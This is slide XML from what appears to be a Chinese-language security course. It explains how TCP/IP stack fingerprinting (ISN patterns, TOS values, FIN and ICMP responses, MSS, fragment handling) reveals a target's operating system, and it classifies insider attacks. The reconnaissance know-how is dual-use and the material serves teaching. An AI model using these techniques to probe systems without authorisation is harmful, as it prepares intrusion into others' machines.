              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会把发送包初始序号作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包序号，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和一些打印机会应答把发送序号加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（服务类型）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口不可达消息的返回包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值有差别。大多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>OxcO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址掩码请求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址掩码请求，有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会产生相应的应答，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OpenVMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SUN Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等，有些则不会。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包响应</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标志位的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包给一个打开端口，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等系统不做响应；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Windows,CISCO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HP/UX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等，则发回一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RESET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚假标记的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>头里设置未定义的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标记，有些目标系统响应时会保持该标记，有些不会，还有些会复位连接。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>识别依据</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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21531631"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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2500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（初始化序列号）：不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP ISN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选择不同</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNIX 64K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>递增；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IRIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>FreeBSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Digital Unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等随机增量；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux 2.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OpenVMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>AIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等用真随机数；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用时间相关模型；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3Com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>集线器使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x803</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apple LaserWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打印机使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>OxC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7001</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等使用常数。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC 1812</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>建议限制各种错误信息的发送率。有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>做了限制，有的没有。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消息引用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>规定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误消息可引用部分引起错误的原消息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口不可达时，大多数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>送回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求头外加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Solaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>送回的稍多，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更多。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分段重组处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会用新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段覆盖旧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段，而有些则会用旧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段覆盖新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>段。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSS(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>最大分段尺寸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有不同默认值，对不同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值的回应也不尽相同。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值很小的包，它一般会把这个值原封不动地返回，但其他系统会返回不同的值。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SYNFlood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>限度：在处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时，不同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有不同的特点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>短时间内收到很多的伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包，一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会停止接受新的连接，一些以支持扩展的方式来防止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>识别依据</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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21531631"/>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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内部人员攻击分为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>恶意的或非恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>恶意攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内部人员有计划的窃听、偷窃或损坏信息，或拒绝其他授权用户的访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>非恶意攻击：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通常由于粗心、知识缺乏或为了“完成工作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等无意间绕过安全策略但对系统产生了破坏的行为造成。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339970" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内部人员攻击</a:t>
            </a:r>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B3342200-07E8-4310-9319-B3198BB4699B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3550793656"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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主动协议栈指纹识别</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被动协议栈指纹识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>识别技术</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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2812134626"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>许多漏洞是系统相关的，且往往与相应的版本对应。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈指纹识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈有标准化定义，但各厂家，如微软和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等，在编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议栈时做出了不同解释</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
